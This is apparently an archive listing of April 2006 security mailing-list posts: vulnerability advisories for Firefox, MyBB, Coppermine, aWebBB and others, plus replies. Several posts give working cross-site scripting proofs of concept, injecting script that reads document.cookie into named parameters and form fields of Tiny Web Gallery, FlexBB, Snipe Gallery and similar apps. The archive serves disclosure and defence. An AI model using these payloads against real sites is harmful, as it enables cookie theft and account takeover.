manila.userland cross site scriptable

2006-04-15 Thread Aaron Kaplan
Manila from manila.userland.com is a widely deployed CMS _ _ (http://http://manila.userland.com/selectedCustomers) \`\ /`/ \ V / This following cross site scripting exploit was sent to /.

Re: QuickBlogger v1.4 Cross-Site Scripting

2006-04-15 Thread Steven M. Christey
This is yet another case where XSS is resultant from a more serious issue. The primary issue here involves local file inclusion. retrogod-style attacks might be feasible by injecting PHP code into text-based data files within the application, then including those text files using this issue;

ZDI-06-010: Mozilla Firefox CSS Letter-Spacing Heap Overflow Vulnerability

2006-04-15 Thread zdi-disclosures
ZDI-06-010: Mozilla Firefox CSS Letter-Spacing Heap Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-06-010.html April 13, 2006 -- CVE ID: CVE-2006-1730 -- Affected Vendor: Mozilla -- Affected Products: Mozilla 1.7.x and below Firefox 1.5.x and below -- TippingPoint(TM)

[KAPDA]MyBB1.1.0~global.php~ParameterExtracting

2006-04-15 Thread addmimistrator
ORIGINAL ADVISORY: http://myimei.com/security/2006-04-14/mybb110globalphpparameterextracting.html ——-Summary—- Software: MyBB Sowtware’s Web Site: http://www.mybboard.com Versions: 1.1.0 Class: Remote Status: Unpatched Exploit: Available Solution: Available Discovered by: imei

[KAPDA]CopperminePhotoGallery1.4.4~ PluginInclusionSystem(index.php)~ RemoteFileInclusion attack

2006-04-15 Thread addmimistrator
ORIGINAL ADVISORY: http://myimei.com/security/2006-04-14/copperminephotogallery144-plugininclusionsystemindexphp-remotefileinclusion-attack.html ——-Summary—- Software: CPG Coppermine Photo Gallery Sowtware’s Web Site: http://coppermine.sourceforge.net/ Versions: 1.4.4.stable Class: Remote

Re: Firefox 1.5.0.1 Password Manager Arbtirary User Browsing History Disclosure

2006-04-15 Thread Eliah Kagan
I guess when he uninstalled Firefox originally, it wasn't a completely clean uninstall. That's the only explanation since we couldn't duplicate my reported bug as easily as we thought. I think that what this comes down to is that when you uninstall Firefox (or Mozilla), it doesn't prompt you

[eVuln] aWebBB Multiple XSS and SQL Injection Vulnerabilities

2006-04-15 Thread alex
New eVuln Advisory: aWebBB Multiple XSS and SQL Injection Vulnerabilities http://evuln.com/vulns/117/summary.html Summary eVuln ID: EV0117 CVE: CVE-2006-1637 CVE-2006-1638 Software: aWebBB Sowtware's Web Site: http://labs.aweb.com.au/ Versions: 1.2 Critical

[SECURITY] [DSA 1035-1] New fcheck packages fix insecure temporary file creation

2006-04-15 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1035-1[EMAIL PROTECTED] http://www.debian.org/security/ Steve Kemp April 15th, 2005

Re[3]: Bypassing ISA Server 2004 with IPv6

2006-04-15 Thread 3APA3A
Dear Christine Kronberg, Microsoft ISA Server can't filter events from Microsoft Mouse, but Microsoft Mouse can be bound to computer. It's security risk, but I know how to secure mouse without ISA and I accept this risk. IPv6 can not be filtered by ISA, but it still can be filtered

Tiny Web Gallery = 1.4 XSS

2006-04-15 Thread qex
Tiny Web Gallery = 1.4 XSS http://www.[SITE].com/[PATH]/index.php?twg_album='scriptalert(document.cookie)/script Found By: Qex

PhpGuestbook = 1.0 XSS

2006-04-15 Thread qex
PhpGuestbook = 1.0 XSS Post Comment:- Name: 'scriptalert(document.cookie)/script Website: Comment: 'scriptalert(document.cookie)/script Found By: Qex

FlexBB = 0.5.7 BETA XSS

2006-04-15 Thread qex
FlexBB = 0.5.7 BETA XSS Start a new thread and type this in the thread name field box :- 'scriptalert(document.cookie)/script Or post a reply to any topic and include this in your reply :- 'scriptalert(document.cookie)/script Found By: Qex

Boardsolution = 1.12 XSS

2006-04-15 Thread qex
Boardsolution = 1.12 XSS http://www.[SITE].com/[PATH]/index.php?action=search Search for:- 'scriptalert(document.cookie)/script Found By: Qex

phpFaber TopSites Script Cross-Site Scripting

2006-04-15 Thread botan
Description : phpFaber TopSites is a feature-packed, reliable and secure Top List coded in PHP and mySQL. phpFaber TopSites has proven its reliability time and time again under the most active server environments. Our feature list is large, including all elements you need to easily maintain

Snipe Gallery = 3.1.4 Multiple XSS

2006-04-15 Thread qex
Snipe Gallery = 3.1.4 Multiple XSS http://www.[SITE].com/[PATH]/view.php?gallery_id='scriptalert(document.cookie)/script http://www.[SITE].com/[PATH]/search.php?keyword='scriptalert(document.cookie)/scriptsearch_cat=search_type=and

Re: Vulnerabilities in MOD

2006-04-15 Thread Victor Brilon
The ModX development released a patch for these bugs this morning. More information available at: http://modxcms.com/forums/index.php/topic,3982.0.html While we greatly appreciate the efforts of cR45H3R in finding these bugs in our code, we'd also appreciate a courtesy email to the dev